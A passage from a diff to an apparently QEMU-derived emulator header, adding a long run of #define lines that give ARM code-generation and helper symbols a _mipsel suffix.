gen_helper_rintd_exact gen_helper_rintd_exact_mipsel +#define gen_helper_rints gen_helper_rints_mipsel +#define gen_helper_rints_exact gen_helper_rints_exact_mipsel +#define gen_helper_ror_cc gen_helper_ror_cc_mipsel +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_mipsel +#define gen_helper_rsqrte_u32 
gen_helper_rsqrte_u32_mipsel +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_mipsel +#define gen_helper_sadd16 gen_helper_sadd16_mipsel +#define gen_helper_sadd8 gen_helper_sadd8_mipsel +#define gen_helper_saddsubx gen_helper_saddsubx_mipsel +#define gen_helper_sar_cc gen_helper_sar_cc_mipsel +#define gen_helper_sdiv gen_helper_sdiv_mipsel +#define gen_helper_sel_flags gen_helper_sel_flags_mipsel +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_mipsel +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_mipsel +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_mipsel +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_mipsel +#define gen_helper_set_rmode gen_helper_set_rmode_mipsel +#define gen_helper_set_user_reg gen_helper_set_user_reg_mipsel +#define gen_helper_shadd16 gen_helper_shadd16_mipsel +#define gen_helper_shadd8 gen_helper_shadd8_mipsel +#define gen_helper_shaddsubx gen_helper_shaddsubx_mipsel +#define gen_helper_shl_cc gen_helper_shl_cc_mipsel +#define gen_helper_shr_cc gen_helper_shr_cc_mipsel +#define gen_helper_shsub16 gen_helper_shsub16_mipsel +#define gen_helper_shsub8 gen_helper_shsub8_mipsel +#define gen_helper_shsubaddx gen_helper_shsubaddx_mipsel +#define gen_helper_ssat gen_helper_ssat_mipsel +#define gen_helper_ssat16 gen_helper_ssat16_mipsel +#define gen_helper_ssub16 gen_helper_ssub16_mipsel +#define gen_helper_ssub8 gen_helper_ssub8_mipsel +#define gen_helper_ssubaddx gen_helper_ssubaddx_mipsel +#define gen_helper_sub_saturate gen_helper_sub_saturate_mipsel +#define gen_helper_sxtb16 gen_helper_sxtb16_mipsel +#define gen_helper_uadd16 gen_helper_uadd16_mipsel +#define gen_helper_uadd8 gen_helper_uadd8_mipsel +#define gen_helper_uaddsubx gen_helper_uaddsubx_mipsel +#define gen_helper_udiv gen_helper_udiv_mipsel +#define gen_helper_uhadd16 gen_helper_uhadd16_mipsel +#define gen_helper_uhadd8 gen_helper_uhadd8_mipsel +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_mipsel +#define gen_helper_uhsub16 
gen_helper_uhsub16_mipsel +#define gen_helper_uhsub8 gen_helper_uhsub8_mipsel +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_mipsel +#define gen_helper_uqadd16 gen_helper_uqadd16_mipsel +#define gen_helper_uqadd8 gen_helper_uqadd8_mipsel +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_mipsel +#define gen_helper_uqsub16 gen_helper_uqsub16_mipsel +#define gen_helper_uqsub8 gen_helper_uqsub8_mipsel +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_mipsel +#define gen_helper_usad8 gen_helper_usad8_mipsel +#define gen_helper_usat gen_helper_usat_mipsel +#define gen_helper_usat16 gen_helper_usat16_mipsel +#define gen_helper_usub16 gen_helper_usub16_mipsel +#define gen_helper_usub8 gen_helper_usub8_mipsel +#define gen_helper_usubaddx gen_helper_usubaddx_mipsel +#define gen_helper_uxtb16 gen_helper_uxtb16_mipsel +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_mipsel +#define gen_helper_v7m_msr gen_helper_v7m_msr_mipsel +#define gen_helper_vfp_absd gen_helper_vfp_absd_mipsel +#define gen_helper_vfp_abss gen_helper_vfp_abss_mipsel +#define gen_helper_vfp_addd gen_helper_vfp_addd_mipsel +#define gen_helper_vfp_adds gen_helper_vfp_adds_mipsel +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_mipsel +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_mipsel +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_mipsel +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_mipsel +#define gen_helper_vfp_divd gen_helper_vfp_divd_mipsel +#define gen_helper_vfp_divs gen_helper_vfp_divs_mipsel +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_mipsel +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_mipsel +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_mipsel +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_mipsel +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_mipsel +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_mipsel +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mipsel 
+#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_mipsel +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_mipsel +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_mipsel +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_mipsel +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_mipsel +#define gen_helper_vfp_mins gen_helper_vfp_mins_mipsel +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_mipsel +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_mipsel +#define gen_helper_vfp_muld gen_helper_vfp_muld_mipsel +#define gen_helper_vfp_muls gen_helper_vfp_muls_mipsel +#define gen_helper_vfp_negd gen_helper_vfp_negd_mipsel +#define gen_helper_vfp_negs gen_helper_vfp_negs_mipsel +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mipsel +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_mipsel +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_mipsel +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_mipsel +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_mipsel +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_mipsel +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_mipsel +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_mipsel +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_mipsel +#define gen_helper_vfp_subd gen_helper_vfp_subd_mipsel +#define gen_helper_vfp_subs gen_helper_vfp_subs_mipsel +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_mipsel +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_mipsel +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_mipsel +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_mipsel +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_mipsel +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_mipsel +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_mipsel +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_mipsel +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_mipsel +#define 
gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_mipsel +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_mipsel +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_mipsel +#define gen_helper_vfp_touid gen_helper_vfp_touid_mipsel +#define gen_helper_vfp_touis gen_helper_vfp_touis_mipsel +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_mipsel +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_mipsel +#define gen_helper_vfp_tould gen_helper_vfp_tould_mipsel +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_mipsel +#define gen_helper_vfp_touls gen_helper_vfp_touls_mipsel +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_mipsel +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_mipsel +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_mipsel +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_mipsel +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_mipsel +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_mipsel +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_mipsel +#define gen_helper_wfe gen_helper_wfe_mipsel +#define gen_helper_wfi gen_helper_wfi_mipsel +#define gen_hvc gen_hvc_mipsel +#define gen_intermediate_code_internal gen_intermediate_code_internal_mipsel +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_mipsel +#define gen_iwmmxt_address gen_iwmmxt_address_mipsel +#define gen_iwmmxt_shift gen_iwmmxt_shift_mipsel +#define gen_jmp gen_jmp_mipsel +#define gen_load_and_replicate gen_load_and_replicate_mipsel +#define gen_load_exclusive gen_load_exclusive_mipsel +#define gen_logic_CC gen_logic_CC_mipsel +#define gen_logicq_cc gen_logicq_cc_mipsel +#define gen_lookup_tb gen_lookup_tb_mipsel +#define gen_mov_F0_vreg gen_mov_F0_vreg_mipsel +#define gen_mov_F1_vreg gen_mov_F1_vreg_mipsel +#define gen_mov_vreg_F0 gen_mov_vreg_F0_mipsel +#define gen_muls_i64_i32 gen_muls_i64_i32_mipsel +#define 
gen_mulu_i64_i32 gen_mulu_i64_i32_mipsel +#define gen_mulxy gen_mulxy_mipsel +#define gen_neon_add gen_neon_add_mipsel +#define gen_neon_addl gen_neon_addl_mipsel +#define gen_neon_addl_saturate gen_neon_addl_saturate_mipsel +#define gen_neon_bsl gen_neon_bsl_mipsel +#define gen_neon_dup_high16 gen_neon_dup_high16_mipsel +#define gen_neon_dup_low16 gen_neon_dup_low16_mipsel +#define gen_neon_dup_u8 gen_neon_dup_u8_mipsel +#define gen_neon_mull gen_neon_mull_mipsel +#define gen_neon_narrow gen_neon_narrow_mipsel +#define gen_neon_narrow_op gen_neon_narrow_op_mipsel +#define gen_neon_narrow_sats gen_neon_narrow_sats_mipsel +#define gen_neon_narrow_satu gen_neon_narrow_satu_mipsel +#define gen_neon_negl gen_neon_negl_mipsel +#define gen_neon_rsb gen_neon_rsb_mipsel +#define gen_neon_shift_narrow gen_neon_shift_narrow_mipsel +#define gen_neon_subl gen_neon_subl_mipsel +#define gen_neon_trn_u16 gen_neon_trn_u16_mipsel +#define gen_neon_trn_u8 gen_neon_trn_u8_mipsel +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_mipsel +#define gen_neon_unzip gen_neon_unzip_mipsel +#define gen_neon_widen gen_neon_widen_mipsel +#define gen_neon_zip gen_neon_zip_mipsel +#define gen_new_label gen_new_label_mipsel +#define gen_nop_hint gen_nop_hint_mipsel +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_mipsel +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_mipsel +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_mipsel +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_mipsel +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_mipsel +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_mipsel +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_mipsel +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_mipsel +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_mipsel +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_mipsel +#define gen_op_iwmmxt_andq_M0_wRn 
gen_op_iwmmxt_andq_M0_wRn_mipsel +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_mipsel +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_mipsel +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_mipsel +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_mipsel +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_mipsel +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_mipsel +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_mipsel +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_mipsel +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_mipsel +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_mipsel +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_mipsel +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_mipsel +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_mipsel +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_mipsel +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_mipsel +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_mipsel +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_mipsel +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_mipsel +#define gen_op_iwmmxt_minul_M0_wRn 
gen_op_iwmmxt_minul_M0_wRn_mipsel +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_mipsel +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_mipsel +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_mipsel +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_mipsel +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_mipsel +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_mipsel +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_mipsel +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_mipsel +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_mipsel +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_mipsel +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_mipsel +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_mipsel +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_mipsel +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_mipsel +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_mipsel +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_mipsel +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_mipsel +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_mipsel +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_mipsel +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_mipsel +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_mipsel +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_mipsel +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_mipsel +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_mipsel +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_mipsel +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_mipsel +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_mipsel +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_mipsel +#define 
gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_mipsel +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_mipsel +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_mipsel +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_mipsel +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_mipsel +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_mipsel +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_mipsel +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_mipsel +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_mipsel +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_mipsel +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_mipsel +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_mipsel +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_mipsel +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_mipsel +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_mipsel +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_mipsel +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_mipsel +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_mipsel +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_mipsel +#define gen_rev16 gen_rev16_mipsel +#define gen_revsh gen_revsh_mipsel +#define gen_rfe gen_rfe_mipsel +#define gen_sar gen_sar_mipsel +#define gen_sbc_CC gen_sbc_CC_mipsel +#define gen_sbfx gen_sbfx_mipsel +#define gen_set_CF_bit31 gen_set_CF_bit31_mipsel +#define gen_set_condexec gen_set_condexec_mipsel +#define gen_set_cpsr gen_set_cpsr_mipsel +#define gen_set_label gen_set_label_mipsel +#define gen_set_pc_im gen_set_pc_im_mipsel +#define gen_set_psr gen_set_psr_mipsel +#define gen_set_psr_im gen_set_psr_im_mipsel +#define gen_shl gen_shl_mipsel +#define gen_shr gen_shr_mipsel +#define gen_smc gen_smc_mipsel +#define gen_smul_dual 
gen_smul_dual_mipsel +#define gen_srs gen_srs_mipsel +#define gen_ss_advance gen_ss_advance_mipsel +#define gen_step_complete_exception gen_step_complete_exception_mipsel +#define gen_store_exclusive gen_store_exclusive_mipsel +#define gen_storeq_reg gen_storeq_reg_mipsel +#define gen_sub_carry gen_sub_carry_mipsel +#define gen_sub_CC gen_sub_CC_mipsel +#define gen_subq_msw gen_subq_msw_mipsel +#define gen_swap_half gen_swap_half_mipsel +#define gen_thumb2_data_op gen_thumb2_data_op_mipsel +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_mipsel +#define gen_ubfx gen_ubfx_mipsel +#define gen_vfp_abs gen_vfp_abs_mipsel +#define gen_vfp_add gen_vfp_add_mipsel +#define gen_vfp_cmp gen_vfp_cmp_mipsel +#define gen_vfp_cmpe gen_vfp_cmpe_mipsel +#define gen_vfp_div gen_vfp_div_mipsel +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_mipsel +#define gen_vfp_F1_mul gen_vfp_F1_mul_mipsel +#define gen_vfp_F1_neg gen_vfp_F1_neg_mipsel +#define gen_vfp_ld gen_vfp_ld_mipsel +#define gen_vfp_mrs gen_vfp_mrs_mipsel +#define gen_vfp_msr gen_vfp_msr_mipsel +#define gen_vfp_mul gen_vfp_mul_mipsel +#define gen_vfp_neg gen_vfp_neg_mipsel +#define gen_vfp_shto gen_vfp_shto_mipsel +#define gen_vfp_sito gen_vfp_sito_mipsel +#define gen_vfp_slto gen_vfp_slto_mipsel +#define gen_vfp_sqrt gen_vfp_sqrt_mipsel +#define gen_vfp_st gen_vfp_st_mipsel +#define gen_vfp_sub gen_vfp_sub_mipsel +#define gen_vfp_tosh gen_vfp_tosh_mipsel +#define gen_vfp_tosi gen_vfp_tosi_mipsel +#define gen_vfp_tosiz gen_vfp_tosiz_mipsel +#define gen_vfp_tosl gen_vfp_tosl_mipsel +#define gen_vfp_touh gen_vfp_touh_mipsel +#define gen_vfp_toui gen_vfp_toui_mipsel +#define gen_vfp_touiz gen_vfp_touiz_mipsel +#define gen_vfp_toul gen_vfp_toul_mipsel +#define gen_vfp_uhto gen_vfp_uhto_mipsel +#define gen_vfp_uito gen_vfp_uito_mipsel +#define gen_vfp_ulto gen_vfp_ulto_mipsel +#define get_arm_cp_reginfo get_arm_cp_reginfo_mipsel +#define get_clock get_clock_mipsel +#define get_clock_realtime get_clock_realtime_mipsel 
+#define get_constraint_priority get_constraint_priority_mipsel +#define get_float_exception_flags get_float_exception_flags_mipsel +#define get_float_rounding_mode get_float_rounding_mode_mipsel +#define get_fpstatus_ptr get_fpstatus_ptr_mipsel +#define get_level1_table_address get_level1_table_address_mipsel +#define get_mem_index get_mem_index_mipsel +#define get_next_param_value get_next_param_value_mipsel +#define get_opt_name get_opt_name_mipsel +#define get_opt_value get_opt_value_mipsel +#define get_page_addr_code get_page_addr_code_mipsel +#define get_param_value get_param_value_mipsel +#define get_phys_addr get_phys_addr_mipsel +#define get_phys_addr_lpae get_phys_addr_lpae_mipsel +#define get_phys_addr_mpu get_phys_addr_mpu_mipsel +#define get_phys_addr_v5 get_phys_addr_v5_mipsel +#define get_phys_addr_v6 get_phys_addr_v6_mipsel +#define get_system_memory get_system_memory_mipsel +#define get_ticks_per_sec get_ticks_per_sec_mipsel +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_mipsel +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__mipsel +#define gt_cntfrq_access gt_cntfrq_access_mipsel +#define gt_cnt_read gt_cnt_read_mipsel +#define gt_cnt_reset gt_cnt_reset_mipsel +#define gt_counter_access gt_counter_access_mipsel +#define gt_ctl_write gt_ctl_write_mipsel +#define gt_cval_write gt_cval_write_mipsel +#define gt_get_countervalue gt_get_countervalue_mipsel +#define gt_pct_access gt_pct_access_mipsel +#define gt_ptimer_access gt_ptimer_access_mipsel +#define gt_recalc_timer gt_recalc_timer_mipsel +#define gt_timer_access gt_timer_access_mipsel +#define gt_tval_read gt_tval_read_mipsel +#define gt_tval_write gt_tval_write_mipsel +#define gt_vct_access gt_vct_access_mipsel +#define gt_vtimer_access gt_vtimer_access_mipsel +#define guest_phys_blocks_free guest_phys_blocks_free_mipsel +#define guest_phys_blocks_init guest_phys_blocks_init_mipsel +#define handle_vcvt handle_vcvt_mipsel +#define handle_vminmaxnm handle_vminmaxnm_mipsel 
+#define handle_vrint handle_vrint_mipsel +#define handle_vsel handle_vsel_mipsel +#define has_help_option has_help_option_mipsel +#define have_bmi1 have_bmi1_mipsel +#define have_bmi2 have_bmi2_mipsel +#define hcr_write hcr_write_mipsel +#define helper_access_check_cp_reg helper_access_check_cp_reg_mipsel +#define helper_add_saturate helper_add_saturate_mipsel +#define helper_add_setq helper_add_setq_mipsel +#define helper_add_usaturate helper_add_usaturate_mipsel +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_mipsel +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_mipsel +#define helper_be_ldq_mmu helper_be_ldq_mmu_mipsel +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_mipsel +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_mipsel +#define helper_be_ldul_mmu helper_be_ldul_mmu_mipsel +#define helper_be_lduw_mmu helper_be_lduw_mmu_mipsel +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_mipsel +#define helper_be_stl_mmu helper_be_stl_mmu_mipsel +#define helper_be_stq_mmu helper_be_stq_mmu_mipsel +#define helper_be_stw_mmu helper_be_stw_mmu_mipsel +#define helper_clear_pstate_ss helper_clear_pstate_ss_mipsel +#define helper_clz_arm helper_clz_arm_mipsel +#define helper_cpsr_read helper_cpsr_read_mipsel +#define helper_cpsr_write helper_cpsr_write_mipsel +#define helper_crc32_arm helper_crc32_arm_mipsel +#define helper_crc32c helper_crc32c_mipsel +#define helper_crypto_aese helper_crypto_aese_mipsel +#define helper_crypto_aesmc helper_crypto_aesmc_mipsel +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_mipsel +#define helper_crypto_sha1h helper_crypto_sha1h_mipsel +#define helper_crypto_sha1su1 helper_crypto_sha1su1_mipsel +#define helper_crypto_sha256h helper_crypto_sha256h_mipsel +#define helper_crypto_sha256h2 helper_crypto_sha256h2_mipsel +#define helper_crypto_sha256su0 helper_crypto_sha256su0_mipsel +#define helper_crypto_sha256su1 helper_crypto_sha256su1_mipsel +#define helper_dc_zva helper_dc_zva_mipsel +#define helper_double_saturate 
helper_double_saturate_mipsel +#define helper_exception_internal helper_exception_internal_mipsel +#define helper_exception_return helper_exception_return_mipsel +#define helper_exception_with_syndrome helper_exception_with_syndrome_mipsel +#define helper_get_cp_reg helper_get_cp_reg_mipsel +#define helper_get_cp_reg64 helper_get_cp_reg64_mipsel +#define helper_get_r13_banked helper_get_r13_banked_mipsel +#define helper_get_user_reg helper_get_user_reg_mipsel +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_mipsel +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_mipsel +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_mipsel +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_mipsel +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_mipsel +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_mipsel +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_mipsel +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_mipsel +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_mipsel +#define helper_iwmmxt_addub helper_iwmmxt_addub_mipsel +#define helper_iwmmxt_addul helper_iwmmxt_addul_mipsel +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_mipsel +#define helper_iwmmxt_align helper_iwmmxt_align_mipsel +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_mipsel +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_mipsel +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_mipsel +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_mipsel +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_mipsel +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_mipsel +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_mipsel +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_mipsel +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_mipsel +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_mipsel +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_mipsel +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_mipsel +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_mipsel +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_mipsel 
